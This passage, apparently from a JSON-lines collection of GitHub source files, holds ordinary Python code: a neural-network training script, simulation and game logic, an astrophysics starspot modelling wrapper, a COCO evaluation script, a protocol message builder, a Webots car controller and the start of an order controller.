'hiddenLayerRBM{:02d}'.format(l) + '_vbias': {\n 'update_position':2,\n 'freq':pretrain_vis_freq\n }\n }\n \n param_man.initalise(\n run_id = MODEL_ID,\n default_freq = n_train_batches//2,\n params = new_params,\n updates = visualise_updates,\n cost = visualise_cost\n )\n \n # go through pretraining epochs 0th epoch is before start\n for epoch in range(1, pretraining_epochs+1):\n epoch_start = timeit.default_timer()\n # go through the training set\n costs = []\n for minibatch_index in range(n_train_batches):\n result = pretraining_fns[l](\n index=minibatch_index,\n lr=pretrain_lr\n )\n \n if type(result) == list:\n # accomodates return of gparams in result\n c = result.pop(0)\n costs.append(c)\n updates = [(g*pretrain_lr).mean() for g in result]\n else:\n # no gparams in result\n c = result\n costs.append(c)\n updates = None\n \n i = (epoch - 1) * n_train_batches + minibatch_index\n \n param_man.getValues(\n i = i,\n cost = np.mean(costs),\n updates = updates\n )\n param_man.writeRuntimeValues(i = i)\n \n av_cost = np.mean(costs)\n epoch_end = timeit.default_timer()\n epoch_time = epoch_end - epoch_start\n logger.debug('Pre-training layer: {}, epoch {}, cost {},'\n ' time {}s'.format(l, epoch, av_cost, epoch_time))\n \n # these sections handle errors nicely\n except KeyboardInterrupt:\n logger.warn('Manual Exit!')\n logger.warn('Moving to clean-up ...')\n except:\n logger.error('Unplanned Exit!')\n for line in traceback.format_exc().split(\"\\n\"):\n logger.error(line)\n \n layer_end = timeit.default_timer()\n layer_time = layer_end - layer_start\n logger.info('done pre-training layer: {}. Time: {} mins'.format(\n l, layer_time/60.))\n \n if param_man.imgs: # only want images from first layer\n param_man.imgs = {}\n del param_man.cost['cost']\n del param_man.params['hiddenLayerRBM{:02d}'.format(l) + '_weights']\n del param_man.params['hiddenLayerRBM{:02d}'.format(l) + '_hbias']\n del param_man.params['hiddenLayerRBM{:02d}'.format(l) + '_vbias']\n del param_man.updates['hiddenLayerRBM{:02d}'.format(l) + '_weights']\n del param_man.updates['hiddenLayerRBM{:02d}'.format(l) + '_hbias']\n del param_man.updates['hiddenLayerRBM{:02d}'.format(l) + '_vbias']\n \n end_time = timeit.default_timer()\n logger.info('The pretraining code for file '\n + os.path.split(__file__)[1]\n + ' ran for {:.2f}m'.format((end_time - start_time) / 60.))\n \n logger.info('Training (fine-tuning) the model ...')\n \n # visualise cost during runtime\n visualise_cost = { # visualising the cost\n 'cost':{'freq':finetrain_vis_freq} # frequency of sampling\n }\n \n new_params = {\n 'logitLayer' + '_weights': {\n 'x': dbn.logitLayer.w,\n 'freq':finetrain_vis_freq,\n },\n 'logitLayer' + '_bias': {\n 'x':dbn.logitLayer.b,\n 'freq':finetrain_vis_freq,\n }\n }\n visualise_updates = {\n 'logitLayer' + '_weights': {\n 'update_position':dbn.n_layers-2,\n 'freq':finetrain_vis_freq\n },\n 'logitLayer' + '_bias': {\n 'update_position':dbn.n_layers-1,\n 'freq':finetrain_vis_freq\n }\n }\n \n for l in range(dbn.n_layers):\n new_params['hiddenLayer{:02d}'.format(l) + '_weights'] = {\n 'x': dbn.sigmoid_layers[l].w,\n 'freq':finetrain_vis_freq,\n }\n new_params['hiddenLayer{:02d}'.format(l) + '_bias'] = {\n 'x': dbn.sigmoid_layers[l].b,\n 'freq':finetrain_vis_freq,\n }\n visualise_updates['hiddenLayer{:02d}'.format(l) + '_weights'] = {\n 'update_position':l*2,\n 'freq':finetrain_vis_freq\n }\n visualise_updates['hiddenLayer{:02d}'.format(l) + '_bias'] = {\n 'update_position':l*2+1,\n 'freq':finetrain_vis_freq\n }\n \n # Visualise these items 
during training\n visualise_weights = { # dict of images to create\n 'inputLayer' + '_weights': { # input - hiddenlayer image\n 'x':dbn.sigmoid_layers[0].w,# the parameter\n 'img_shape':(29*2, 29*2*3), # prod. of tuple == # input nodes\n 'tile_shape':(25, 40), # Max number is # nodes in next layer\n 'tile_spacing':(1, 1), # separate imgs x,y\n 'freq':finetrain_vis_freq,\n 'runtime_plots':True\n },\n 'logitLayer' + '_weights': { # hidden - logistic layer\n 'x':dbn.logitLayer.w,\n 'img_shape':(40, 25), # prod. of tuple == # hidden nodes\n 'tile_shape':(1, 2),\n 'freq':finetrain_vis_freq\n }\n }\n # add the weights for each hidden layer\n # This can only be done as hidden_layer_sizes are all the same\n for i in range(1, dbn.n_layers):\n visualise_weights['hiddenLayer{:02d}'.format(i) + '_weights'] = {\n 'x':dbn.sigmoid_layers[i].w,\n 'img_shape':(40, 25),\n 'tile_shape':(25, 25),\n 'freq':finetrain_vis_freq\n }\n \n param_man.initalise(\n run_id = MODEL_ID,\n default_freq = n_train_batches//2,\n params = new_params,\n imgs = visualise_weights,\n cost = visualise_cost,\n updates = visualise_updates\n )\n \n # get the training, validation and testing function for the model\n logger.debug('building fine-tuning functions')\n train_model, validate_model, test_model = dbn.buildFinetuneFunctions(\n datasets=datasets,\n batch_size=batch_size,\n learning_rate=finetune_lr\n )\n \n logger.debug('training')\n \n utils.training.train(dbn, train_model, validate_model, test_model,\n n_train_batches, n_valid_batches, n_test_batches,\n training_epochs, finetune_lr,\n patience, patience_increase, improvement_threshold,\n MODEL, MODEL_ID, logger,\n visualise=param_man\n )\n pass","repo_name":"flipdazed/weather-modelling","sub_path":"train_dbn.py","file_name":"train_dbn.py","file_ext":"py","file_size_in_byte":12587,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"52"} +{"seq_id":"8084277123","text":"# Simple env test.\nimport json\nimport select\nimport time\nimport logging\nimport threading\n\nimport gym\nimport matplotlib.pyplot as plt\nimport minerl\nimport numpy as np\nfrom minerl.env.core import MineRLEnv\n\nimport coloredlogs\n\ncoloredlogs.install(logging.DEBUG)\n\n# import minerl.env.bootstrap\n# minerl.env.bootstrap._check_port_avail = lambda _,__: True\n\nNUM_EPISODES = 1\nNUM_ENVS = 2\n\n\nclass MineRLRunner(threading.Thread):\n def __init__(self, env_name, create_synchronously=True, **kwargs):\n self.env_name = env_name\n if create_synchronously:\n self.env = gym.make(env_name)\n else:\n self.env = None\n super().__init__(**kwargs)\n\n def run(self):\n env = self.env\n if env is None:\n env = gym.make(self.env_name)\n for _ in range(NUM_EPISODES):\n obs = env.reset()\n done = False\n netr = 0\n while not done:\n random_act = env.action_space.noop()\n\n random_act['camera'] = [0, 0.1 * obs[\"compassAngle\"]]\n random_act['back'] = 0\n random_act['forward'] = 1\n random_act['jump'] = 1\n random_act['attack'] = 1\n obs, reward, done, info = env.step(\n random_act)\n netr += reward\n env.close()\n print(f'{self.getName()} finished!')\n\n\ndef test(create_synchronously=True):\n threads = [MineRLRunner('MineRLNavigateDense-v0', create_synchronously) for _ in range(NUM_ENVS)]\n for t in threads:\n t.start()\n while any([t.is_alive() for t in threads]):\n time.sleep(1)\n\n\nif __name__ == \"__main__\":\n 
test()\n","repo_name":"minerllabs/minerl","sub_path":"tests/excluded/multiple_env_test.py","file_name":"multiple_env_test.py","file_ext":"py","file_size_in_byte":1686,"program_lang":"python","lang":"en","doc_type":"code","stars":587,"dataset":"github-code","pt":"52"} +{"seq_id":"19343169989","text":"# Licensed under the MIT License - see LICENSE.rst\nfrom __future__ import (absolute_import, division, print_function,\n unicode_literals)\nfrom glob import glob\nimport datetime\nfrom threading import Lock\nfrom warnings import warn\nimport os, subprocess, shutil\n\nimport numpy as np\nfrom astropy.io import ascii\nfrom astropy.io.ascii import InconsistentTableError\n\nfrom .lightcurve import LightCurve\nfrom .exceptions import (OverlappingSpotsWarning, STSPMemoryWarning,\n STSPFailureWarning)\n\n\n__all__ = ['STSP', 'clean_up_rms_stsp_dirs']\n\nlock = Lock()\n\nstsp_executable = os.getenv('STSP_EXECUTABLE')\n\ninfile_template_l = \"\"\"#PLANET PROPERTIES\n1\t\t\t\t\t\t\t; Number of planets -- (if there are more than 1 planet, then the set of 8 planet properties are repeated)\n{t0:2.10f}\t\t\t\t\t; T0, epoch (middle of first transit) in days.\n{period:2.10f}\t\t\t\t; Planet Period (days)\n{depth:2.10f}\t\t\t\t; (Rp/Rs)^2 (Rplanet / Rstar )^ 2\n{duration:2.10f}\t\t\t; Duration (days) (physical duration of transit, not used)\n{b:2.10f}\t\t\t\t\t; Impact parameter (0= planet cross over equator)\n{inclination:2.10f}\t\t\t; Inclination angle of orbit (90 deg = planet crosses over equator)\n{lam:2.10f}\t\t\t\t\t; Lambda of orbit (0 deg = orbital axis along z-axis)\n{ecosw:2.10f}\t\t\t; ecosw\n{esinw:2.10f}\t\t\t; esinw\n#STAR PROPERTIES\n{rho_s:2.10f} \t\t\t; Mean Stellar density (Msun/Rsun^3)\n{per_rot:2.10f}\t\t\t; Stellar Rotation period (days)\n4780\t\t\t\t\t; Stellar Temperature\n0.31\t\t\t\t\t; Stellar metallicity\n{tilt_from_z:2.10f}\t\t\t\t\t\t; Tilt of the rotation axis of the star down from z-axis (degrees)\n{nonlinear_ld}\t\t\t; Limb darkening (4 coefficients)\n{n_ld_rings:d}\t\t\t; number of rings for limb darkening appoximation\n#SPOT PROPERTIES\n{n_spots}\t\t\t\t\t\t; number of spots\n{spot_contrast}\t\t\t\t\t; fractional lightness of spots (0.0=total dark, 1.0=same as star)\n#LIGHT CURVE\n{model_path}\t\t\t; lightcurve input data file\n{start_time:2.10f}\t\t; start time to start fitting the light curve\n{lc_duration:2.10f}\t\t; duration of light curve to fit (days)\n{real_max:2.10f}\t\t; real maximum of light curve data (corrected for noise), 0 -> use downfrommax\n{normalize_oot:d} \t; is light curve flattened (to zero) outside of transits?\n#ACTION\nl\t\t\t\t\t\t; l= generate light curve from parameters\n{spot_params}\n1.00\n\"\"\"\n\nspot_params_template = \"\"\"{spot_radius:2.10f}\t\t; spot radius\n{spot_theta:2.10f}\t\t; theta\n{spot_phi:2.10f}\t\t; phi\n\"\"\"\n\n\ndef quadratic_to_nonlinear(u1, u2):\n a1 = a3 = 0\n a2 = u1 + 2*u2\n a4 = -u2\n return a1, a2, a3, a4\n\n\ndef _spot_obj_to_params(spot, quiet=False):\n\n if hasattr(spot, '__len__'):\n non_overlapping_spot_inds = find_overlapping_spots(spot)\n return np.concatenate([[s.r, s.theta, s.phi]\n for i, s in enumerate(spot)\n if i in non_overlapping_spot_inds])\n else:\n return np.array([spot.r, spot.theta, spot.phi])\n\n\ndef find_overlapping_spots(spot_list):\n from overlap import find_overlapping_spots as find\n return find(np.array([spot.theta for spot in spot_list]),\n np.array([spot.phi for spot in spot_list]),\n np.array([spot.r for spot in spot_list]))\n\n# def find_overlapping_spots(spot_list, tolerance=1.01, 
quiet=False):\n# \"\"\"\n# Find overlapping spots in a list of spot objects.\n#\n# Parameters\n# ----------\n# spot_list : list\n# tolerance : float\n# \"\"\"\n# overlapping_pairs = []\n# spots_with_overlap = []\n# for i in range(len(spot_list)):\n# for j in range(len(spot_list)):\n# if i < j:\n# sep = np.arccos(np.cos(spot_list[i].theta) *\n# np.cos(spot_list[j].theta) +\n# np.sin(spot_list[i].theta) *\n# np.sin(spot_list[j].theta) *\n# np.cos(spot_list[i].phi - spot_list[j].phi))\n# if sep < tolerance * (spot_list[i].r + spot_list[j].r):\n# overlapping_pairs.append((i, j))\n#\n# if i not in spots_with_overlap:\n# spots_with_overlap.append(i)\n# if j not in spots_with_overlap:\n# spots_with_overlap.append(j)\n#\n# spots_without_overlap = [spot for i, spot in enumerate(spot_list)\n# if i not in spots_with_overlap]\n# save_these_spot_indices = [i[0] for i in overlapping_pairs]\n# save_these_spots = [spot for i, spot in enumerate(spot_list)\n# if i in save_these_spot_indices]\n#\n# if len(spots_with_overlap) > 0 and not quiet:\n# toss_these_spot_indices = [i[1] for i in overlapping_pairs]\n# toss_these_spots = [spot for i, spot in enumerate(spot_list)\n# if i in toss_these_spot_indices]\n# warning_message = ('Some spots were overlapping. Tossing one of the two'\n# ' overlapping spots. \\n\\nSpots tossed:\\n\\n' +\n# '\\n'.join(map(str, toss_these_spots)))\n# warn(warning_message, OverlappingSpotsWarning)\n#\n# return spots_without_overlap #+ save_these_spots\n\n\ndef get_rms_dirs():\n \"\"\"\n Get a list of the STSP directories generated by the rms package.\n \"\"\"\n pkg_dir = os.path.dirname(os.path.abspath(__file__))\n rms_stsp_dirs = glob(os.path.join(pkg_dir, '.rms*'))\n return rms_stsp_dirs\n\n\ndef check_for_undeleted_stsp_dirs(n_dirs_threshold=5):\n \"\"\"\n Check for necessary cleanup warnings.\n\n The current API writes STSP input files and output files within the rms\n package directory. This function will raise a warning if the number of\n STSP run directories is piling up, so you don't accidentally store lots of\n hidden directories within the rms package directory.\n \"\"\"\n rms_stsp_dirs = get_rms_dirs()\n\n if len(rms_stsp_dirs) > n_dirs_threshold:\n warn_message = (\"You currently have more than {0} STSP input/output \"\n \"directories stored by rms. Consider turning off \"\n \"the `keep_dirs` option, and using the \"\n \"`rms.clean_up_rms_stsp_dirs` command to delete them \"\n \"(and to prevent saving tons of hidden folders within \"\n \"the rms package). \"\n \"\\n\\nDirectories to delete:\\n\\n{1}\"\n .format(n_dirs_threshold, '\\n'.join(rms_stsp_dirs)))\n warn(warn_message, STSPMemoryWarning)\n\n\ndef clean_up_rms_stsp_dirs():\n \"\"\"\n Delete lingering STSP input/output directories created by rms.\n\n Whenever the STSP object is constructed and `outdir` is not specified, a\n new directory is created within the rms package directory. If you use the\n `keep_dirs` option or an unexpected error occurs while running STSP, those\n hidden directories created by rms can accrue. And nobody wants that. 
So you\n can use this command to make them go away.\n \"\"\"\n rms_stsp_dirs = get_rms_dirs()\n for directory in rms_stsp_dirs:\n shutil.rmtree(directory)\n\n\nclass STSP(object):\n \"\"\"\n Context manager for working with STSP\n \"\"\"\n def __init__(self, times, star, spot, outdir=None, keep_dir=False,\n quiet=False):\n \"\"\"\n Parameters\n ----------\n times : `~astropy.time.Time`\n Time array object\n star : `~rms.Star`\n Parameters for star\n spot : `~rms.Spot` or list of `~rms.Spot` objects\n Spot parameter object(s)\n outdir : str\n Directory to write temporary outputs into\n skip_overlap_check : bool\n If True, skip check that no spots are overlapping.\n \"\"\"\n self.times = times\n self.star = star\n self.quiet = quiet\n self.spot_params = _spot_obj_to_params(spot, quiet=quiet)\n self.spot_contrast = self.star.spot_contrast\n\n current_time = datetime.datetime.now().strftime(\"%Y%m%d_%H%M%S_%f\")\n random_integer = np.random.randint(0, 1e6)\n\n if outdir is None:\n self.outdir = os.path.abspath(os.path.join(os.path.dirname(__file__),\n '.rms_tmp_{0}_{1}'\n .format(current_time, random_integer)))\n else:\n self.outdir = outdir\n\n os.makedirs(self.outdir)\n\n self.model_path = os.path.join(self.outdir, 'model_lc.dat')\n self.keep_dir = keep_dir\n\n def __enter__(self):\n check_for_undeleted_stsp_dirs()\n return self\n\n def __exit__(self, *args):\n if not self.keep_dir:\n shutil.rmtree(self.outdir)\n\n def generate_lightcurve(self, n_ld_rings=40, stsp_exec=None,\n normalize_oot=False):\n \"\"\"\n Generate a light curve with STSP.\n\n Parameters\n ----------\n n_ld_rings : int\n Number of concentric rings to use in the limb-darkening\n approximation\n stsp_exec : str (optional)\n Optionally pass in a path to a different STSP executable with this\n argument.\n normalize_oot : bool\n Normalize the out-of-transit portions of the light curve? Default\n is `False`. 
Set to `True` when studying spot occultations during\n transits.\n\n Return\n ------\n lc : `~rms.LightCurve`\n Light curve object with the model from STSP.\n \"\"\"\n\n if stsp_exec is None:\n stsp_exec = stsp_executable\n\n # Normalize light curve to unity\n real_max = 1\n\n times = self.times.jd\n fluxes = np.ones_like(times)\n\n np.savetxt(self.model_path, np.vstack([times, fluxes, fluxes]).T,\n fmt=str('%1.10f'), delimiter='\\t', header='stspinputs')\n\n # Calculate parameters for STSP:\n eccentricity, omega = self.star.planet.ecc, self.star.planet.w\n ecosw = eccentricity*np.cos(np.radians(omega))\n esinw = eccentricity*np.sin(np.radians(omega))\n start_time = times[0]\n lc_duration = times[-1] - times[0] + 1e-6\n nonlinear_ld = quadratic_to_nonlinear(*self.star.u)\n nonlinear_ld_string = ' '.join(map(\"{0:.5f}\".format, nonlinear_ld))\n\n # get spot parameters sorted out\n spot_params_str = _spot_params_to_string(self.spot_params)\n\n # Stick those values into the template file\n\n params_dict = dict(period=self.star.planet.per, ecosw=ecosw,\n esinw=esinw, lam=self.star.planet.lam,\n tilt_from_z=90-self.star.inc_stellar,\n start_time=start_time, lc_duration=lc_duration,\n real_max=real_max, per_rot=self.star.per_rot,\n rho_s=self.star.rho_s, depth=self.star.planet.rp ** 2,\n duration=self.star.planet.duration,\n t0=self.star.planet.t0, b=self.star.planet.b,\n inclination=self.star.planet.inc,\n nonlinear_ld=nonlinear_ld_string,\n n_ld_rings=n_ld_rings,\n spot_params=spot_params_str[:-1],\n n_spots=int(len(self.spot_params)/3),\n model_path=os.path.basename(self.model_path),\n spot_contrast=self.spot_contrast,\n normalize_oot=int(normalize_oot))\n\n in_file_text = infile_template_l.format(**params_dict)\n\n # Write out the `.in` file\n with open(os.path.join(self.outdir, 'test.in'), 'w') as in_file:\n in_file.write(in_file_text)\n\n try:\n stdout = subprocess.check_call([stsp_exec, 'test.in'],\n cwd=self.outdir)\n except subprocess.CalledProcessError as err:\n if not self.quiet:\n warning_message = (\"STSP failed - this could be a result of \"\n \"bad inputs.\")\n warn(warning_message, STSPFailureWarning)\n\n # Read the outputs\n lcout_path = os.path.join(self.outdir, 'test_lcout.txt')\n if not os.path.exists(lcout_path) or os.stat(lcout_path).st_size == 0:\n stsp_times = self.times.jd\n stsp_fluxes = np.ones(len(self.times))\n stsp_flag = 0 * np.ones(len(self.times))\n\n else:\n try:\n tbl = ascii.read(lcout_path,\n format='fast_no_header')\n stsp_times, stsp_fluxes, stsp_flag = tbl['col1'], tbl['col4'].data, tbl['col5']\n except InconsistentTableError:\n stsp_times = self.times.jd\n stsp_fluxes = np.ones(len(self.times)) * np.nan\n stsp_flag = 0 * np.ones(len(self.times))\n return LightCurve(times=stsp_times, fluxes=stsp_fluxes, quarters=stsp_flag)\n\n\ndef _spot_params_to_string(spot_params):\n spot_params_str = \"\"\n for param_set in np.split(spot_params, len(spot_params)/3):\n spot_params_str += spot_params_template.format(spot_radius=param_set[0],\n spot_theta=param_set[1],\n spot_phi=param_set[2])\n return spot_params_str\n\n\n","repo_name":"bmorris3/rms","sub_path":"rms/stsp.py","file_name":"stsp.py","file_ext":"py","file_size_in_byte":13363,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"9171010222","text":"from gameComponents import gameVars, winOrLose\n\n\n\n\ndef winorlose(status):\n\n\tprint(\"You\", status, \"! 
Would you like to play again?\")\n\tchoice = input(\"Yes / No\")\n\n\tif choice == \"No\" or choice == \"no\":\n\t\tprint(\"You chose to leave! Better luck next time :)\")\n\t\texit()\n\n\telif choice == \"Yes\" or choice == \"yes\":\n\t\t# reset the player lives and the AI lives\n\t\t# and set player to False so that our loop will restart\n\n\t\tgameVars.player_lives = 5\n\t\tgameVars.ai_lives = 5\n\t\tgameVars.player = False\n\n\n\telse:\n\t\tprint(\"Make a valid choice - Yes or No\")\n\t\tchoice = input(\"Yes / No: \")\n","repo_name":"YeonjuKim05/Kim_Y_RPS_Fall2020","sub_path":"gameComponents/chooseWinner.py","file_name":"chooseWinner.py","file_ext":"py","file_size_in_byte":581,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"12817375247","text":"import sys\n\n\ndef solve(cur_day, cur_muscle):\n    global n, k, kits, visited, ans\n\n    if cur_day == n:\n        ans += 1\n        return\n\n    for i in range(n):\n        if visited[i]:\n            continue\n\n        if cur_muscle + kits[i] - k < 500:\n            continue\n\n        visited[i] = True\n        solve(cur_day + 1, cur_muscle + kits[i] - k)\n        visited[i] = False\n\n\nn, k = map(int, sys.stdin.readline().strip().split(\" \"))\nkits = list(map(int, sys.stdin.readline().strip().split(\" \")))\nvisited = [False for _ in range(n)]\nans = 0\nsolve(0, 500)\nprint(ans)","repo_name":"galid1/Algorithm","sub_path":"python/baekjoon/2.algorithm/brute_force/18429.근손실.py","file_name":"18429.근손실.py","file_ext":"py","file_size_in_byte":565,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"74498296483","text":"from coco import coco\nfrom coco import cocoeval\nimport json\n\nimport argparse\nparser = argparse.ArgumentParser(description='Evaluation Arguments')\nparser.add_argument('--result', required=True, type=str, help='coco results json')\nargs = parser.parse_args()\n\n\nresult_file = args.result\nann_file = 'path/to/instances_val2017.json'\n\ndef main():\n    coco_gt = coco.COCO(ann_file)\n    coco_dt = coco_gt.loadRes(result_file)\n\n    coco_eval = cocoeval.COCOeval(coco_gt, coco_dt, 'bbox', eval_pkl=None, vis_path=None)\n\n    coco_eval.evaluate()\n    coco_eval.accumulate()\n    coco_eval.summarize()\n\n\nif __name__ == '__main__':\n    main()","repo_name":"Artherbull/test1","sub_path":"eval_coco.py","file_name":"eval_coco.py","file_ext":"py","file_size_in_byte":627,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"6595795120","text":"# coded by lagcleaner\n# email: lagcleaner@gmail.com\n\nfrom io import BytesIO\nfrom typing import Union\nfrom multipledispatch import dispatch\nfrom tfprotocol_client.misc.build_utils import MessageUtils\nfrom tfprotocol_client.misc.constants import (\n    DFLT_HEADER_SIZE,\n    INT_SIZE,\n)\n\n\nclass TfProtocolMessage:\n    \"\"\"Transfer Protocol Message object builder.\"\"\"\n\n    def __init__(\n        self,\n        *payloads,\n        custom_header: Union[int, bytes, None] = None,\n        header_signed: bool = True,\n        trim_body: bool = False,\n        separate_by_spaces: bool = True,\n        header_size: int = DFLT_HEADER_SIZE,\n    ) -> None:\n        self.custom_header = MessageUtils.encode_value(\n            custom_header, size=header_size, signed=header_signed\n        )\n        self.body_buffer = BytesIO()\n        self.header_size = header_size if header_size else DFLT_HEADER_SIZE\n        self.header_signed = header_signed\n        for i, e in enumerate(payloads):\n            if separate_by_spaces and i != 0:\n                self.add(b' ')\n            self.add(e)\n        self.trim_body = trim_body\n\n    @dispatch((str, bytes, bool))\n    
def add(self, payload: Union[str, bytes, bool], **_):\n        self.body_buffer.write(MessageUtils.encode_value(payload))\n        return self\n\n    # pylint: disable=function-redefined\n    @dispatch(int)\n    def add(self, payload: int, size: int = INT_SIZE, signed=False, **_):\n        self.body_buffer.write(\n            MessageUtils.encode_value(payload, size=size, signed=signed)\n        )\n        return self\n\n    @property\n    def header(self) -> bytes:\n        if self.custom_header is not None:\n            header = MessageUtils.encode_value(self.custom_header)\n        else:\n            header = MessageUtils.encode_value(\n                len(self.payload), size=self.header_size, signed=self.header_signed\n            )\n        return header\n\n    @property\n    def payload(self) -> bytes:\n        if self.trim_body:\n            return self.body_buffer.getvalue().strip(b' ')\n        return self.body_buffer.getvalue()\n\n    def __iter__(self):\n        yield self.header\n        yield self.payload\n","repo_name":"GoDjango-Development/tfprotocol_client_py","sub_path":"tfprotocol_client/models/message.py","file_name":"message.py","file_ext":"py","file_size_in_byte":2147,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"}
{"seq_id":"73521715044","text":"#Piotr Socała\n# (create a helper function that checks the GCD)\n# iterate over successive elements of the array\n# and consider every possible combination\n# in 3 for loops\n#\n\n\ndef check_NWD(a, b, c):\n    if a == 1 or b == 1 or c == 1:\n        return 1\n    first = 0\n    second = 0\n    third = 0\n    i = 2\n    while i <= a and i <= b:\n        if a % i == 0 and b % i == 0:\n            first = i\n            break\n        i += 1\n    if first == 0:\n        first = 1\n    i = 2\n    while i <= a and i <= c:\n        if a % i == 0 and c % i == 0:\n            second = i\n            break\n        i += 1\n    if second == 0:\n        second = 1\n\n    i = 2\n    while i <= b and i <= c:\n        if b % i == 0 and c % i == 0:\n            third = i\n            break\n        i += 1\n    if third == 0:\n        third = 1\n\n    if first == second == third == 1:\n        return True\n\n    return False\n\n#end def\n\n\ndef trojki(T):\n    k = len(T)\n    counter = 0\n    for x in range(k-2):\n        for y in range(x+1, x+3):\n            if y <= k-2:\n                for z in range(y+1, y+3):\n                    if z > k-1:\n                        break\n                    if check_NWD(T[x], T[y], T[z]):\n                        counter += 1\n\n    return counter\n#end def\n\n\n","repo_name":"Gygrus/WDI-ASD-course-Python","sub_path":"Semestr I/Kolosy nie dla wrpawy/kolos 22.01.2021 zdany już jupi/zad5.py","file_name":"zad5.py","file_ext":"py","file_size_in_byte":1267,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
{"seq_id":"41809657249","text":"\"\"\"Autonomous car using a\nLIDAR in WEBOTS\nAuthors: Chrysanthe and Jessica\n\"\"\"\n\nimport numpy as np\nimport random\nimport time\nimport matplotlib.pyplot as plt\nimport json\nimport datetime\nimport os.path as osp\nimport sys\nsys.path.append(\"../\")\nfrom car_logic import CarLogic\n\n\n# --------------GYM----------------------------\n\nclass CarController(CarLogic):\n    def __init__(self):\n        print(\"Initializing the Webots/Gym environment...\")\n        super().__init__() # Object inheriting from the Driver class\n\n        self.trajectories = {'rotations':[],'positions':[]}\n        self.num_laps = 0\n        self.goal_num_laps = 2\n\n        self.INITIAL_trans = self.car.getPosition()\n        self.INITIAL_rot = self.car.getField(\"rotation\").getSFRotation()\n\n    def respawn(self,speedCommand=0,steeringCommand=0):\n\n        x,y,z = self.INITIAL_trans\n        INITIAL_trans = [x + random.uniform(-0.05,0.05), y+ random.uniform(-0.05,0.05), z]\n        INITIAL_rot = self.INITIAL_rot\n        self.trans_champs.setSFVec3f(INITIAL_trans)\n        self.rot_champs.setSFRotation(INITIAL_rot)\n\n        
time.sleep(0.3)\n        self.current_advancement = set()\n        self.current_positions = []\n        self.current_rotations = []\n\n    # Reset for the GYM environment\n    def reset(self):\n        super().reset()\n        self.trajectories['positions'].append(self.current_positions)\n        self.trajectories['rotations'].append(self.current_rotations)\n\n\n\n    def step(self):\n\n        self.current_positions.append(self.car.getPosition())\n        self.current_rotations.append(self.car.getField(\"rotation\").getSFRotation())\n\n        ## lap check\n        balise = self.capteur_balise.getValue()\n\n        if balise > 700:\n            id = self.get_balise_id()\n            if id not in self.current_advancement:\n                self.current_advancement.add(id)\n                if len(self.current_advancement) >= len(self.balises):\n                    self.num_laps +=1\n                    if self.num_laps + 1 > self.goal_num_laps:\n                        self.reset()\n                        return False\n                    self.reset()\n                else:\n                    print(f\"Beacon {id} passed\")\n\n\n        ## Driving\n\n        xy_lidar = list(map(lambda x: (x.x, x.y), self.lidar.getPointCloud()))\n        y_lidar = list(map(lambda x: x.y, self.lidar.getPointCloud()))\n\n        dist = list(map(lambda p: p[0] ** 2 + p[1] ** 2, xy_lidar))\n        # front_dist = np.array(dist[-8:] + dist[:8])\n        front_dist = np.array(dist[-8:] + dist[:8])\n\n        # distance to the nearest finite obstacle ahead\n        min_front_dist = front_dist[np.isfinite(front_dist)].min()\n        id = dist.index(min_front_dist)\n\n        if id in [0, 1, len(dist), len(dist) - 1]:\n            super().setCruisingSpeed(-0.5)\n            super().setSteeringAngle(-0.1)\n\n        elif y_lidar[id] < 0:\n            super().setCruisingSpeed(0.5)\n            super().setSteeringAngle(-0.4)\n        else:\n            super().setCruisingSpeed(0.5)\n            super().setSteeringAngle(0.4)\n\n\n\n        super().step()\n\n        return True\n\n\n# ----------------Main program--------------------\ndef main():\n    t = datetime.datetime.now()\n    t = t.strftime('-%H%M-%d%m')\n    map_name = \"MultiTrackEasy_1\"\n    path_to_traj = osp.join(\"../../worlds/trajectories\",f\"{map_name}-{t}.json\")\n\n\n    carController = CarController()\n    carController.respawn()\n\n\n    for _ in range(10000):\n        running = carController.step()\n\n        if not running:\n            break\n    print(\"End of the run :)\")\n\n\n    traj_1_position = carController.trajectories['positions'][0]\n    traj_1_rotation = carController.trajectories[\"rotations\"][0]\n\n\n    rotations = []\n    positions = []\n    for i in range(10,len(traj_1_position),20):\n        rotations.append(traj_1_rotation[i])\n        positions.append(traj_1_position[i])\n\n    x_traj = list(map(lambda x: x[0], positions))\n    y_traj = list(map(lambda x: x[1], positions))\n    plt.scatter(x_traj, y_traj)\n    plt.show()\n\n    print(len(rotations))\n    with open(path_to_traj, 'w') as f:\n        f.write(json.dumps({'positions':positions,'rotations':rotations}))\n\n    # a = json.loads(f.read())\n\nif __name__ == '__main__':\n    main()\n\n","repo_name":"Maxew42/dockerfile-ros2-webots","sub_path":"scripts/controllers/trajectory_estimator/trajectory_estimator.py","file_name":"trajectory_estimator.py","file_ext":"py","file_size_in_byte":4202,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
{"seq_id":"31949357340","text":"# -*- coding: utf-8 -*-\n\nimport logging\nimport requests\nimport datetime\n\nfrom util.db_helper import *\nfrom util.response import *\nfrom util.dict_helper import *\nfrom util.format_helper import *\nfrom oms.models.order_models import LabOrder,LabProduct\nfrom oms.models.utilities_models import *\nfrom wms.models import inventory_struct_lens, product_frame\nfrom vendor.models import lens\nfrom pg_oms import settings\n\n\nclass stockorder_to_laborder_controller:\n\n    def create_laborder(self, data_dict, flag):\n        data = {}\n        try:\n            
